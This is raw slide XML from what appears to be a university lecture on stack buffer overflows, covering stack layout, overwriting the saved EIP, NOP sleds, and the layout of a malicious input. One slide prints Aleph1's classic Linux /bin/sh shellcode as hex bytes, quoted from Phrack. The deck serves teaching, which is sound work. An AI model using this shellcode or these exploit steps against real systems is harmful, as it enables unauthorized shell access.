              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23586" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6395200" y="3047546"/>
              <a:ext cx="2973261" cy="7616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800" smtClean="0"/>
                <a:t>local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54301" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="3784600"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54279" name="Right Arrow 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4572000"/>
            <a:ext cx="3048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7" name="Group 41"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2667000"/>
            <a:ext cx="1450975" cy="598488"/>
            <a:chOff x="4495800" y="2667000"/>
            <a:chExt cx="1451097" cy="597932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54284" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4953000" y="2895600"/>
              <a:ext cx="6431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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54285" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5479181" y="3087624"/>
              <a:ext cx="4677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6" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="2667000"/>
              <a:ext cx="14478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/>
                <a:t>0x41414141</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54281" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5880100" y="3546475"/>
            <a:ext cx="2438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</a:rPr>
              <a:t>          AAAAAAAAAAA</a:t>
            </a:r>
          </a:p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</a:rPr>
              <a:t>AAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54282" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4191000"/>
            <a:ext cx="1143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</a:rPr>
              <a:t>A A A A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54283" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4538663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</a:rPr>
              <a:t>A A A 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Stack overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56322" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28681" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="5486400"/>
            <a:ext cx="228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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control Hijacked by Attacker!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56325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8580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F7794E8-D96A-CD4B-A0A8-50D1489ED890}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56326" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56336" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="29718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7" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56338" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56339" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56340" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56341" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56342" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3810000"/>
              <a:ext cx="2971800" cy="439681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56343" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125"/>
              <a:ext cx="2971800" cy="439681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56344" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56345" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="4403252"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56346" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="4631852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7" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56348" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56349" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3048000"/>
              <a:ext cx="2971800" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56327" name="Right Arrow 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5600700" y="2971800"/>
            <a:ext cx="3048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8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6829425" y="4495800"/>
            <a:ext cx="4619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&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56329" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5880100" y="3546475"/>
            <a:ext cx="2438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</a:rPr>
              <a:t>          AAAAAAAAAAA</a:t>
            </a:r>
          </a:p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</a:rPr>
              <a:t>AAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56330" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4191000"/>
            <a:ext cx="1143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</a:rPr>
              <a:t>A A A A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56331" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4538663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</a:rPr>
              <a:t>A A A A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 41"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2667000"/>
            <a:ext cx="1450975" cy="598488"/>
            <a:chOff x="4495800" y="2667000"/>
            <a:chExt cx="1451097" cy="597932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56333" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4953000" y="2895600"/>
              <a:ext cx="6431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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56334" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5479181" y="3087624"/>
              <a:ext cx="4677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5" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="2667000"/>
              <a:ext cx="14478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/>
                <a:t>0x41414141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Writing a buffer overflow exploit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Inject a piece of code into the buffer that will give you a shell on the system (called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="280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800">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="280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800">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>), and let EIP point to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>What will be the privilege of the shell?</a:t>
            </a:r>
          </a:p>
          <a:p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How to write a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="280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800">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="280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800">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Needs to be written in a machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s native language; once executed, gives attacker a shell on the machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Many existing shellcodes for use.</a:t>
            </a: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9DA77C-C23A-B142-90EA-6218D5E382F6}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld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The “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Shell Code”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6562" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="83820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/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Aleph1's Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>from "Smashing the stack for fun and profit",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 49, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>   "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>   "\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>";</a:t>
            </a:r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FC41D7-59DB-DA48-8941-351258358401}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld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Creating a malicious input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67586" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2590800"/>
            <a:ext cx="3429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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2590800"/>
            <a:ext cx="3886200" cy="4572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88" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="35052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The original buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36872" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="2590800"/>
            <a:ext cx="1143000" cy="4572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EIP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3352800" y="2590800"/>
            <a:ext cx="2057400" cy="4667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Shell Code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1066800" y="2590800"/>
            <a:ext cx="2286000" cy="4667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NOP sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29711" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1422400"/>
            <a:ext cx="5105400" cy="1168400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T8" fmla="*/ 0 w 3216"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7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6"/>
              <a:gd name="T16" fmla="*/ 0 h 736"/>
              <a:gd name="T17" fmla="*/ 3216 w 3216"/>
              <a:gd name="T18" fmla="*/ 736 h 7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6" h="736">
                <a:moveTo>
                  <a:pt x="3216" y="736"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3156" y="600"/>
                  <a:pt x="3096" y="464"/>
                  <a:pt x="2880" y="352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2664" y="240"/>
                  <a:pt x="2272" y="104"/>
                  <a:pt x="1920" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1568" y="24"/>
                  <a:pt x="1088" y="0"/>
                  <a:pt x="768" y="112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="448" y="224"/>
                  <a:pt x="224" y="480"/>
                  <a:pt x="0" y="7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533400" y="4449763"/>
            <a:ext cx="8001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Questions: 1.  How long should the input be?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>                   2. Where should we put the EIP in the input?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
